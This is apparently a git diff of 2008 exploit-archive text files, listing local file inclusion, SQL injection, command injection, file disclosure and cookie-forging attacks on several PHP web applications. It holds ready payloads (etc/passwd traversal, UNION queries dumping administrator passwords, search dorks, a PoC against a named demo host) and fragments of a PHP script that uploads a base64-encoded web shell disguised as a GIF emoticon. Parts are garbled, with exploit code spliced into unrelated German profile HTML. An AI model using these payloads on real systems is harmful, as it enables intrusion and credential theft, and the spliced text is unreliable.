+ # Bug: (for example) ./emerge-1.0/connect/index.php (line: 2)
+ #
+ # ...
+ # require ("init.inc");
+ # ...
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6552.txt b/platforms/php/webapps/6552.txt
index 84ff4ac42..2e9674e0e 100755
--- a/platforms/php/webapps/6552.txt
+++ b/platforms/php/webapps/6552.txt
@@ -1,47 +1,46 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##################################################################
- #  [ mailwatch <= 1.0.4 ]   Local File Inclusion Vulnerability   #
- ##################################################################
- #
- # Script site: http://sourceforge.net/projects/mailwatch/
- #
- # Vuln: 
- # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00
- #      
- #
- # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34)
- #
- # ...
- #	if (isset($_GET[doc])) {
- #	 include("docs/".$_GET[doc].".html");
- #	} else {
- #	 echo "
    
+                Benutzerinformationen
+            
    Benutzername: 
    Benutzergruppe: 
+                                
+            
    
+                Zusätzliche Informationen
+            
    Geschlecht: 
+
+                
+            
    Geburtstag: 
+                
+
+                
+
+                
+            
    Benutzertext: ";
-   print "";
-   $res=curl("$url/images/emoticons/sphp.php","z=$eval");
-   $res=strstr($res,"GIF89a");
-   print substr($res,41);exit;
-}
-
-if (strlen($url)>10)
-{
-  print "\n
    Trying to Get /config/users.php...";flush();
-  $res=curl($url."/config/users.php","");
-  if (strstr($res,'|')) print "Done!\n\n$res";
-  else error("\n\nUsername & Password Not Found\n\n$res");
-
-  print "\n
    Trying to Get Username & Password...";flush();
-  $res=str_replace("\r\n","\n",$res);
-  $res=substr($res,strpos($res,"\n\n")+2);
-  $line=explode("\n",$res);$n=count($line)-1;
-  if ($n) {
-  print "\nDone! Found - $n users:\n";
-   for ($x=0;$x<$n;$x++){
-     $up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2);
-     print "\nUsername - ".$up[1]."\tPassword - ".$up[2];
-   }
-  }
-
-  print "\n
    Trying to Login...";flush();
-  $postvar="user=$user[0]&pass=$pass[0]&";
-  $res=curl($url."/login_cgi.php","$postvar");
-  $cook=strstr($res,'Set-Cookie: sid=');
-  $cook=substr($cook,12,strpos($cook,';')-12);
-  if ($cook) print "\n\nDone...  Cookie - $cook";else error("\n
    Error To Login
    \n\n\n$res");
-
-  print "\n
    Trying to Upload Emoticon...";flush();
-  $buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8+Ow==";
-  if (@filesize('sphp.php')!=82){
-       $f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f);
-  }
-  $f=getcwd()."/sphp.php";
-  $res=curl($url."/emoticons.php",array('user_emot'=>"@$f"));
-  if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n
    Error To Upload
    \n\n\n$res");
-
-  print "\n
    Trying to Exploit...";flush();
-  $res=curl($url."/images/emoticons/sphp.php","z=print 20080824;");
-  if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n
    Error To Exploit
    \n\n\n$res");
-
-  print "\n
    Trying to Logout...";flush();
-  $res=curl($url."/logout.php","");
-  if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n
    Error To Logout
    \n\n\n$res");
-  print "\nEnter PHP Command:\n";
-}
-print "";
-?>
-
-# milw0rm.com [2008-08-26]
+3)
+      curl_setopt ($ch, CURLOPT_COOKIE, "$cook");
+  $res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "
    $err
    ";
+  curl_close($ch);
+  return $res;
+}
+
+function error($msg){
+  print "
    $msg
    \n
    Not Exploitable";exit;
+}
+
+extract($_POST);extract($_GET);
+
+print "
    URL:
    ";
+if (strlen($eval)>3){
+   $eval=stripslashes($eval);
+   print "\nEnter PHP Command:\n
    $data[description]
    $data[description]
    \n";
- #	 echo " \n";
- #	 echo "  \n";
- #	 echo " \n";
- #	 echo "
    \n";
- #	 echo "  
    Documentation
    \n";
- #	 echo "  This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish.";
- #	 echo "  
    \n";
- #	}
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-24]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##################################################################
+ #  [ mailwatch <= 1.0.4 ]   Local File Inclusion Vulnerability   #
+ ##################################################################
+ #
+ # Script site: http://sourceforge.net/projects/mailwatch/
+ #
+ # Vuln: 
+ # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00
+ #      
+ #
+ # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34)
+ #
+ # ...
+ #	if (isset($_GET[doc])) {
+ #	 include("docs/".$_GET[doc].".html");
+ #	} else {
+ #	 echo "\n";
+ #	 echo " \n";
+ #	 echo "  \n";
+ #	 echo " \n";
+ #	 echo "
    \n";
+ #	 echo "  
    Documentation
    \n";
+ #	 echo "  This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish.";
+ #	 echo "  
    \n";
+ #	}
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6553.txt b/platforms/php/webapps/6553.txt
index 2fbcc4b58..df59627a3 100755
--- a/platforms/php/webapps/6553.txt
+++ b/platforms/php/webapps/6553.txt
@@ -1,39 +1,38 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###################################################################
- #  [ PHPcounter <= 1.3.2 ]   Local File Inclusion Vulnerability   #
- ###################################################################
- #
- # Script: "A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors."
- #
- # Script site: http://phpcounter.sourceforge.net/
- # Download: http://sourceforge.net/projects/phpcounter/
- #
- # Vuln: 
- # http://site.com/[phpcounter.1.3.2]/defs.php?l=../../../../../../../etc/passwd%00
- #     
- #
- # Bug: ./phpcounter.1.3.2/defs.php (line: 49)
- #
- # ...
- # 	@include("langs/$_GET[l].php");
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-24]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###################################################################
+ #  [ PHPcounter <= 1.3.2 ]   Local File Inclusion Vulnerability   #
+ ###################################################################
+ #
+ # Script: "A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors."
+ #
+ # Script site: http://phpcounter.sourceforge.net/
+ # Download: http://sourceforge.net/projects/phpcounter/
+ #
+ # Vuln: 
+ # http://site.com/[phpcounter.1.3.2]/defs.php?l=../../../../../../../etc/passwd%00
+ #     
+ #
+ # Bug: ./phpcounter.1.3.2/defs.php (line: 49)
+ #
+ # ...
+ # 	@include("langs/$_GET[l].php");
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6555.txt b/platforms/php/webapps/6555.txt
index 6113e3115..185b0ffbe 100755
--- a/platforms/php/webapps/6555.txt
+++ b/platforms/php/webapps/6555.txt
@@ -1,57 +1,57 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # 
-#-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan #              
-#                   and all darkc0de members                ---# 
-################################################################ 
-# 
-# Author: r45c4l (Special thanks to congrallion)
-# 
-# Home  : www.darkc0de.com 
-# 
-# Email : r45c4l@hotmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Title: Jadu CMS for Government (recruit_details.php) Remote SQL Inj
-#
-#
-# Vendor: http://www.jadu.co.uk/site/index.php
-#
-# 
-#
-###########################################################
-#
-# d0rk:inurl:site/scripts/recruit_details.php?id
-# d0rk:inurl:"recruit_details.php?id=" 
-#
-###########################################################
- 
-  POC 1: 
-
-	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12--
-
-  POC 2:
-
-	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators--
-
-
-###########################################################
-#
-#  Bug discovered : 24 Sep.2008
-###########################################################
-
-# milw0rm.com [2008-09-24]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # 
+#-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan #              
+#                   and all darkc0de members                ---# 
+################################################################ 
+# 
+# Author: r45c4l (Special thanks to congrallion)
+# 
+# Home  : www.darkc0de.com 
+# 
+# Email : r45c4l@hotmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Title: Jadu CMS for Government (recruit_details.php) Remote SQL Inj
+#
+#
+# Vendor: http://www.jadu.co.uk/site/index.php
+#
+# 
+#
+###########################################################
+#
+# d0rk:inurl:site/scripts/recruit_details.php?id
+# d0rk:inurl:"recruit_details.php?id=" 
+#
+###########################################################
+ 
+  POC 1: 
+
+	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12--
+
+  POC 2:
+
+	http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators--
+
+
+###########################################################
+#
+#  Bug discovered : 24 Sep.2008
+###########################################################
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6556.txt b/platforms/php/webapps/6556.txt
index 8c46a529d..c034b4176 100755
--- a/platforms/php/webapps/6556.txt
+++ b/platforms/php/webapps/6556.txt
@@ -1,15 +1,15 @@
-##################################################################################
-## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
-## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
-## Demo : http://gyrbo.madoka.be/web-cp/
-## Vuln :
-## }
-## if ($tf = fopen($filelocation, "r")) {
-## // Date in the past
-##################################################################################
-## POC :
-##      http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
-## Open By Mozilla Firefox
-##################################################################################
-
-# milw0rm.com [2008-09-24]
+##################################################################################
+## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability
+## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz
+## Demo : http://gyrbo.madoka.be/web-cp/
+## Vuln :
+## }
+## if ($tf = fopen($filelocation, "r")) {
+## // Date in the past
+##################################################################################
+## POC :
+##      http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php
+## Open By Mozilla Firefox
+##################################################################################
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6557.txt b/platforms/php/webapps/6557.txt
index 81f75bcf5..86882035f 100755
--- a/platforms/php/webapps/6557.txt
+++ b/platforms/php/webapps/6557.txt
@@ -1,30 +1,30 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-adnforum <= 1.0b / Insecure Cookie Handling Vulnerability 
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-$ Program: adnforum
-$ Version: <= 1.0b
-$ File affected: index.php
-$ Download: http://sourceforge.net/projects/adnforum/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-
-Cookie is base64 based and the ascii format used is:
-user:23ed4e45887ad4311ff654bd4aab6540:user:0
-user:md5 pass:user:0
-
-Programmer forgot to check the pass and only use the nick to autenticate
-the user.
-
-You can create a fake cookie likes this:
-sysop:000000000000000000000000000000:sysop:0
-
-In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA
-
-Exploit:
-javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
-
-# milw0rm.com [2008-09-24]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+adnforum <= 1.0b / Insecure Cookie Handling Vulnerability 
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+$ Program: adnforum
+$ Version: <= 1.0b
+$ File affected: index.php
+$ Download: http://sourceforge.net/projects/adnforum/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+Cookie is base64 based and the ascii format used is:
+user:23ed4e45887ad4311ff654bd4aab6540:user:0
+user:md5 pass:user:0
+
+Programmer forgot to check the pass and only use the nick to autenticate
+the user.
+
+You can create a fake cookie likes this:
+sysop:000000000000000000000000000000:sysop:0
+
+In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA
+
+Exploit:
+javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6558.txt b/platforms/php/webapps/6558.txt
index e90e32bf7..33e27b0ea 100755
--- a/platforms/php/webapps/6558.txt
+++ b/platforms/php/webapps/6558.txt
@@ -1,46 +1,45 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###################################################################
- #  [ barcodegen <= 2.0.0 ]   Local File Inclusion Vulnerability   #
- ###################################################################
- #
- # Script: "Barcode Generator 1D"
- #
- # Script site: http://www.barcodephp.com/
- # Download: http://www.barcodephp.com/download.php
- #
- # Vuln: 
- # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00
- #     
- #
- # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8)
- #
- # ...
- # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) 
- #    && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) {
- #	require('config.php');
- #	require($class_dir.'/BCGColor.php');
- #	require($class_dir.'/BCGBarcode.php');
- #	require($class_dir.'/BCGDrawing.php');
- #	require($class_dir.'/BCGFont.php');
- #	if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {	// LFI
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-24]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###################################################################
+ #  [ barcodegen <= 2.0.0 ]   Local File Inclusion Vulnerability   #
+ ###################################################################
+ #
+ # Script: "Barcode Generator 1D"
+ #
+ # Script site: http://www.barcodephp.com/
+ # Download: http://www.barcodephp.com/download.php
+ #
+ # Vuln: 
+ # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00
+ #     
+ #
+ # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8)
+ #
+ # ...
+ # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) 
+ #    && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) {
+ #	require('config.php');
+ #	require($class_dir.'/BCGColor.php');
+ #	require($class_dir.'/BCGBarcode.php');
+ #	require($class_dir.'/BCGDrawing.php');
+ #	require($class_dir.'/BCGFont.php');
+ #	if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) {	// LFI
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6559.txt b/platforms/php/webapps/6559.txt
index 2cd884206..afce084f2 100755
--- a/platforms/php/webapps/6559.txt
+++ b/platforms/php/webapps/6559.txt
@@ -1,64 +1,63 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #########################################################
- #  [ observer <= 0.3.2.1 ]   Remote Command Execution   #
- #########################################################
- #
- # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
- #
- # Script site: http://www.project-observer.org/
- # Download: http://freshmeat.net/projects/observer/
- #
- # Vuln: 
- # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
- # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a    
- #
- #
- # Bug(1): ./observer-0.3.2.1/html/whois.php
- #
- # ...
- # 	$output = `/usr/bin/whois $_GET[query] | grep -v \%`;
- #	$output = trim($output);
- #	echo("
    $output
    ");
- # ... 	 
- #
- #
- # Bug(2): ./observer-0.3.2.1/html/netcmd.php
- #
- # ...
- #  switch ($_GET[cmd]) {
- #   case 'whois':
- #     $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
- #     break;
- #   case 'ping':
- #     $output = `/bin/ping $_GET[query]`;
- #     break;
- #   case 'tracert':
- #     $output = `/usr/sbin/traceroute $_GET[query]`;
- #     break;
- #   case 'nmap':
- #     $output = `/usr/bin/nmap $_GET[query]`;
- #     break;
- #  }
- #  $output = trim($output);
- #  echo("
    $output
    ");
- # ... 			    		    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-24]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #########################################################
+ #  [ observer <= 0.3.2.1 ]   Remote Command Execution   #
+ #########################################################
+ #
+ # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks."
+ #
+ # Script site: http://www.project-observer.org/
+ # Download: http://freshmeat.net/projects/observer/
+ #
+ # Vuln: 
+ # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a
+ # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a    
+ #
+ #
+ # Bug(1): ./observer-0.3.2.1/html/whois.php
+ #
+ # ...
+ # 	$output = `/usr/bin/whois $_GET[query] | grep -v \%`;
+ #	$output = trim($output);
+ #	echo("
    $output
    ");
+ # ... 	 
+ #
+ #
+ # Bug(2): ./observer-0.3.2.1/html/netcmd.php
+ #
+ # ...
+ #  switch ($_GET[cmd]) {
+ #   case 'whois':
+ #     $output = `/usr/bin/whois $_GET[query] | grep -v \%`;
+ #     break;
+ #   case 'ping':
+ #     $output = `/bin/ping $_GET[query]`;
+ #     break;
+ #   case 'tracert':
+ #     $output = `/usr/sbin/traceroute $_GET[query]`;
+ #     break;
+ #   case 'nmap':
+ #     $output = `/usr/bin/nmap $_GET[query]`;
+ #     break;
+ #  }
+ #  $output = trim($output);
+ #  echo("
    $output
    ");
+ # ... 			    		    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-24]
diff --git a/platforms/php/webapps/6562.txt b/platforms/php/webapps/6562.txt
index 641cb277e..2d780eb25 100755
--- a/platforms/php/webapps/6562.txt
+++ b/platforms/php/webapps/6562.txt
@@ -1,50 +1,49 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##########################################################################
- #  [ lansuite <= 3.4 beta r1363 ]   Local File Inclusion Vulnerability   #
- ##########################################################################
- #
- # Script: "Lansuite - Webbased LAN-Party Management System"
- #
- # Script site: http://lansuite.orgapage.de
- # Download: http://sourceforge.net/project/showfiles.php?group_id=105885
- #
- # Vuln: 
- # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00
- #     
- #
- # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)
- #
- # ...
- #	if (!$auth["design"]) $auth["design"] = "simple";
- #	if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple";
- #	$_SESSION["auth"]["design"] = $auth["design"];
- #	if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design'];      // [1]
- #
- #	// Statistic Functions (for generating server- and usage-statistics)
- #	if ($db->success)	$stats = new stats();
- #
- #	// Boxes
- #	if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php");
- #
- #	if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); 			  // [2] LFI
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-25]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##########################################################################
+ #  [ lansuite <= 3.4 beta r1363 ]   Local File Inclusion Vulnerability   #
+ ##########################################################################
+ #
+ # Script: "Lansuite - Webbased LAN-Party Management System"
+ #
+ # Script site: http://lansuite.orgapage.de
+ # Download: http://sourceforge.net/project/showfiles.php?group_id=105885
+ #
+ # Vuln: 
+ # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00
+ #     
+ #
+ # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254)
+ #
+ # ...
+ #	if (!$auth["design"]) $auth["design"] = "simple";
+ #	if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple";
+ #	$_SESSION["auth"]["design"] = $auth["design"];
+ #	if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design'];      // [1]
+ #
+ #	// Statistic Functions (for generating server- and usage-statistics)
+ #	if ($db->success)	$stats = new stats();
+ #
+ #	// Boxes
+ #	if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php");
+ #
+ #	if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); 			  // [2] LFI
+ # ... 			    
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-09-25]
diff --git a/platforms/php/webapps/6563.txt b/platforms/php/webapps/6563.txt
index 46ca5f4e6..079624c52 100755
--- a/platforms/php/webapps/6563.txt
+++ b/platforms/php/webapps/6563.txt
@@ -1,58 +1,57 @@
-
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###################################################################
- #  [ phpOCS <= 0.1-beta3 ]   Local File Inclusion Vulnerability   #
- ###################################################################
- #
- # Script: "phpOCS is a fully featured Online Community System. It has fully customisable message boards, calendars, galleries and articles."
- #
- # Script site: http://phpocs.sourceforge.net/
- # Download: http://sourceforge.net/projects/phpocs/
- #
- # Vuln: 
- # http://site.com/[phpocs-0.1-beta3]/index.php?act=../../../../../../../etc/passwd%00
- #     
- #
- # Bug: ./phpocs-0.1-beta3/index.php (lines: 7 and 9)
- #
- # ...
- # 7:     include("library/include.inc.php");   	// (1);
- # 9:     makepage();					// (2);
- # ... 			    
- #
- #
- # Bug: ./phpocs-0.1-beta3/library/pagefunctions.inc.php (lines: 3-104)
- #
- # ...
- # 3:     function makepage() {
- # ...    // (lines: 72-79)
- #   	if (isset($_GET['act']))
- #		{
- #		include("library/{$_GET['act']}.php"); 	// (3) LFI
- #		}
- #	else
- #		{
- #		include("library/home.php");
- #		}
- # ...
- # 104:   }
- # ... 			    
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-09-25]
